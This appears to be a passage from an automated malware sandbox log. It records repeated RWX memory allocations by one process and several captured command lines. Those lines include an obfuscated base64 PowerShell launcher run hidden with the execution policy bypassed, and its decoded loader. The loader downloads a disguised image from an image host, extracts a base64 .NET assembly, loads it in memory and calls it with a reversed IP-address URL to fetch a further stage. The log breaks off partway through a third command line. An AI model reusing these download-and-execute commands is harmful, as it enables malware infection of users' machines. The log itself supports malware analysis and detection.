NtAllocateVirtualMemory

process_identifier: 2204
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02643000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02644000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02677000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0263b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02662000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02675000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02645000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02940000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02646000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02663000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02664000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02665000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02666000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02667000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02668000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02669000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c25000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c26000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c27000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c28000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c29000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c2a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c2b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c2c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c2d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c2e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c2f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05010000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05011000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05013000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05014000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -command "$Codigo = 'J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶VQBy◀▶Gw◀▶I◀▶◀▶9◀▶C◀▶◀▶JwBo◀▶HQ◀▶d◀▶Bw◀▶HM◀▶Og◀▶v◀▶C8◀▶dQBw◀▶Gw◀▶bwBh◀▶GQ◀▶Z◀▶Bl◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBu◀▶HM◀▶LgBj◀▶G8◀▶bQ◀▶u◀▶GI◀▶cg◀▶v◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBz◀▶C8◀▶M◀▶◀▶w◀▶DQ◀▶Lw◀▶2◀▶DE◀▶Mw◀▶v◀▶DU◀▶MQ◀▶1◀▶C8◀▶bwBy◀▶Gk◀▶ZwBp◀▶G4◀▶YQBs◀▶C8◀▶cgB1◀▶G0◀▶c◀▶Bf◀▶HY◀▶YgBz◀▶F8◀▶YQBu◀▶HQ◀▶aQB2◀▶G0◀▶LgBq◀▶H◀▶◀▶Zw◀▶/◀▶DE◀▶Ng◀▶5◀▶DU◀▶MQ◀▶0◀▶Dc◀▶Mg◀▶1◀▶DU◀▶Jw◀▶7◀▶CQ◀▶dwBl◀▶GI◀▶QwBs◀▶Gk◀▶ZQBu◀▶HQ◀▶I◀▶◀▶9◀▶C◀▶◀▶TgBl◀▶Hc◀▶LQBP◀▶GI◀▶agBl◀▶GM◀▶d◀▶◀▶g◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶TgBl◀▶HQ◀▶LgBX◀▶GU◀▶YgBD◀▶Gw◀▶aQBl◀▶G4◀▶d◀▶◀▶7◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Hc◀▶ZQBi◀▶EM◀▶b◀▶Bp◀▶GU◀▶bgB0◀▶C4◀▶R◀▶Bv◀▶Hc◀▶bgBs◀▶G8◀▶YQBk◀▶EQ◀▶YQB0◀▶GE◀▶K◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBV◀▶HI◀▶b◀▶◀▶p◀▶Ds◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶V◀▶Bl◀▶Hg◀▶d◀▶◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶V◀▶Bl◀▶Hg◀▶d◀▶◀▶u◀▶EU◀▶bgBj◀▶G8◀▶Z◀▶Bp◀▶G4◀▶ZwBd◀▶Do◀▶OgBV◀▶FQ◀▶Rg◀▶4◀▶C4◀▶RwBl◀▶HQ◀▶UwB0◀▶HI◀▶aQBu◀▶Gc◀▶K◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶KQ◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶I◀▶◀▶9◀▶C◀▶◀▶Jw◀▶8◀▶Dw◀▶QgBB◀▶FM◀▶RQ◀▶2◀▶DQ◀▶XwBT◀▶FQ◀▶QQBS◀▶FQ◀▶Pg◀▶+◀▶Cc◀▶Ow◀▶k◀▶GU◀▶bgBk◀▶EY◀▶b◀▶Bh◀▶Gc◀▶I◀▶◀▶9◀▶C◀▶◀▶Jw◀▶8◀▶Dw◀▶QgBB◀▶FM◀▶RQ◀▶2◀▶DQ◀▶XwBF◀▶E4◀▶R◀▶◀▶+◀▶D4◀▶Jw◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBU◀▶GU◀▶e◀▶B0◀▶C4◀▶SQBu◀▶GQ◀▶ZQB4◀▶E8◀▶Zg◀▶o◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶KQ◀▶7◀▶CQ◀▶ZQBu◀▶GQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶FQ◀▶ZQB4◀▶HQ◀▶LgBJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶TwBm◀▶Cg◀▶J◀▶Bl◀▶G4◀▶Z◀▶BG◀▶Gw◀▶YQBn◀▶Ck◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶Gc◀▶ZQ◀▶g◀▶D◀▶◀▶I◀▶◀▶t◀▶GE◀▶bgBk◀▶C◀▶◀▶J◀▶Bl◀▶G4◀▶Z◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶Gc◀▶d◀▶◀▶g◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶g◀▶Cs◀▶PQ◀▶g◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶LgBM◀▶GU◀▶bgBn◀▶HQ◀▶a◀▶◀▶7◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶T◀▶Bl◀▶G4◀▶ZwB0◀▶Gg◀▶I◀▶◀▶9◀▶C◀▶◀▶J◀▶Bl◀▶G4◀▶Z◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶C◀▶◀▶J◀▶Bz◀▶HQ◀▶YQBy◀▶HQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶Ds◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BD◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶FQ◀▶ZQB4◀▶HQ◀▶LgBT◀▶HU◀▶YgBz◀▶HQ◀▶cgBp◀▶G4◀▶Zw◀▶o◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶s◀▶C◀▶◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BM◀▶GU◀▶bgBn◀▶HQ◀▶a◀▶◀▶p◀▶Ds◀▶J◀▶Bj◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶QwBv◀▶G4◀▶dgBl◀▶HI◀▶d◀▶Bd◀▶Do◀▶OgBG◀▶HI◀▶bwBt◀▶EI◀▶YQBz◀▶GU◀▶Ng◀▶0◀▶FM◀▶d◀▶By◀▶Gk◀▶bgBn◀▶Cg◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BD◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶Ck◀▶Ow◀▶k◀▶Gw◀▶bwBh◀▶GQ◀▶ZQBk◀▶EE◀▶cwBz◀▶GU◀▶bQBi◀▶Gw◀▶eQ◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶UgBl◀▶GY◀▶b◀▶Bl◀▶GM◀▶d◀▶Bp◀▶G8◀▶bg◀▶u◀▶EE◀▶cwBz◀▶GU◀▶bQBi◀▶Gw◀▶eQBd◀▶Do◀▶OgBM◀▶G8◀▶YQBk◀▶Cg◀▶J◀▶Bj◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶p◀▶Ds◀▶J◀▶B0◀▶Hk◀▶c◀▶Bl◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶b◀▶Bv◀▶GE◀▶Z◀▶Bl◀▶GQ◀▶QQBz◀▶HM◀▶ZQBt◀▶GI◀▶b◀▶B5◀▶C4◀▶RwBl◀▶HQ◀▶V◀▶B5◀▶H◀▶◀▶ZQ◀▶o◀▶Cc◀▶RgBp◀▶GI◀▶ZQBy◀▶C4◀▶S◀▶Bv◀▶G0◀▶ZQ◀▶n◀▶Ck◀▶Ow◀▶k◀▶G0◀▶ZQB0◀▶Gg◀▶bwBk◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶d◀▶B5◀▶H◀▶◀▶ZQ◀▶u◀▶Ec◀▶ZQB0◀▶E0◀▶ZQB0◀▶Gg◀▶bwBk◀▶Cg◀▶JwBW◀▶EE◀▶SQ◀▶n◀▶Ck◀▶LgBJ◀▶G4◀▶dgBv◀▶Gs◀▶ZQ◀▶o◀▶CQ◀▶bgB1◀▶Gw◀▶b◀▶◀▶s◀▶C◀▶◀▶WwBv◀▶GI◀▶agBl◀▶GM◀▶d◀▶Bb◀▶F0◀▶XQ◀▶g◀▶Cg◀▶JwB0◀▶Hg◀▶d◀▶◀▶u◀▶DQ◀▶Mg◀▶0◀▶DM◀▶cgBn◀▶C8◀▶b◀▶B0◀▶C8◀▶Nw◀▶2◀▶DE◀▶Lg◀▶x◀▶DY◀▶MQ◀▶u◀▶DY◀▶NQ◀▶x◀▶C4◀▶N◀▶◀▶5◀▶C8◀▶Lw◀▶6◀▶H◀▶◀▶d◀▶B0◀▶Gg◀▶Jw◀▶g◀▶Cw◀▶I◀▶◀▶n◀▶GI◀▶bwBz◀▶HQ◀▶YQ◀▶n◀▶Ck◀▶KQ◀▶='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('◀▶','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/613/515/original/rump_vbs_antivm.jpg?1695147255';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.4243rg/lt/761.161.651.49//:ptth' , 'bosta'))"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶VQBy◀▶Gw◀▶I◀▶◀▶9◀▶C◀▶◀▶JwBo◀▶HQ◀▶d◀▶Bw◀▶HM◀▶Og◀▶v◀▶C8◀▶dQBw◀▶Gw◀▶bwBh◀▶GQ◀▶Z◀▶Bl◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBu◀▶HM◀▶LgBj◀▶G8◀▶bQ◀▶u◀▶GI◀▶cg◀▶v◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBz◀▶C8◀▶M◀▶◀▶w◀▶DQ◀▶Lw◀▶2◀▶DE◀▶Mw◀▶v◀▶DU◀▶MQ◀▶1◀▶C8◀▶bwBy◀▶Gk◀▶ZwBp◀▶G4◀▶YQBs◀▶C8◀▶cgB1◀▶G0◀▶c◀▶Bf◀▶HY◀▶YgBz◀▶F8◀▶YQBu◀▶HQ◀▶aQB2◀▶G0◀▶LgBq◀▶H◀▶◀▶Zw◀▶/◀▶DE◀▶Ng◀▶5◀▶DU◀▶MQ◀▶0◀▶Dc◀▶Mg◀▶1◀▶DU◀▶Jw◀▶7◀▶CQ◀▶dwBl◀▶GI◀▶QwBs◀▶Gk◀▶ZQBu◀▶HQ◀▶I◀▶◀▶9◀▶C◀▶◀▶TgBl◀▶Hc◀▶LQBP◀▶GI◀▶agBl◀▶GM◀▶d◀▶◀▶g◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶TgBl◀▶HQ◀▶LgBX◀▶GU◀▶YgBD◀▶Gw◀▶aQBl◀▶G4◀▶d◀▶◀▶7◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Hc◀▶ZQBi◀▶EM◀▶b◀▶Bp◀▶GU◀▶bgB0◀▶C4◀▶R◀▶Bv◀▶Hc◀▶bgBs◀▶G8◀▶YQBk◀▶EQ◀▶YQB0◀▶GE◀▶K◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBV◀▶HI◀▶b◀▶◀▶p◀▶Ds◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶V◀▶Bl◀▶Hg◀▶d◀▶◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶V◀▶Bl◀▶Hg◀▶d◀▶◀▶u◀▶EU◀▶bgBj◀▶G8◀▶Z◀▶Bp◀▶G4◀▶ZwBd◀▶Do◀▶OgBV◀▶FQ◀▶Rg◀▶4◀▶C4◀▶RwBl◀▶HQ◀▶UwB0◀▶HI◀▶aQBu◀▶Gc◀▶K◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶KQ◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶I◀▶◀▶9◀▶C◀▶◀▶Jw◀▶8◀▶Dw◀▶QgBB◀▶FM◀▶RQ◀▶2◀▶DQ◀▶XwBT◀▶FQ◀▶QQBS◀▶FQ◀▶Pg◀▶+◀▶Cc◀▶Ow◀▶k◀▶GU◀▶bgBk◀▶EY◀▶b◀▶Bh◀▶Gc◀▶I◀▶◀▶9◀▶C◀▶◀▶Jw◀▶8◀▶Dw◀▶QgBB◀▶FM◀▶RQ◀▶2◀▶DQ◀▶XwBF◀▶E4◀▶R◀▶◀▶+◀▶D4◀▶Jw◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBU◀▶GU◀▶e◀▶B0◀▶C4◀▶SQBu◀▶GQ◀▶ZQB4◀▶E8◀▶Zg◀▶o◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶KQ◀▶7◀▶CQ◀▶ZQBu◀▶GQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶FQ◀▶ZQB4◀▶HQ◀▶LgBJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶TwBm◀▶Cg◀▶J◀▶Bl◀▶G4◀▶Z◀▶BG◀▶Gw◀▶YQBn◀▶Ck◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶Gc◀▶ZQ◀▶g◀▶D◀▶◀▶I◀▶◀▶t◀▶GE◀▶bgBk◀▶C◀▶◀▶J◀▶Bl◀▶G4◀▶Z◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶Gc◀▶d◀▶◀▶g◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶g◀▶Cs◀▶PQ◀▶g◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶LgBM◀▶GU◀▶bgBn◀▶HQ◀▶a◀▶◀▶7◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶T◀▶Bl◀▶G4◀▶ZwB0◀▶Gg◀▶I◀▶◀▶9◀▶C◀▶◀▶J◀▶Bl◀▶G4◀▶Z◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶C◀▶◀▶J◀▶Bz◀▶HQ◀▶YQBy◀▶HQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶Ds◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BD◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶C◀▶◀▶P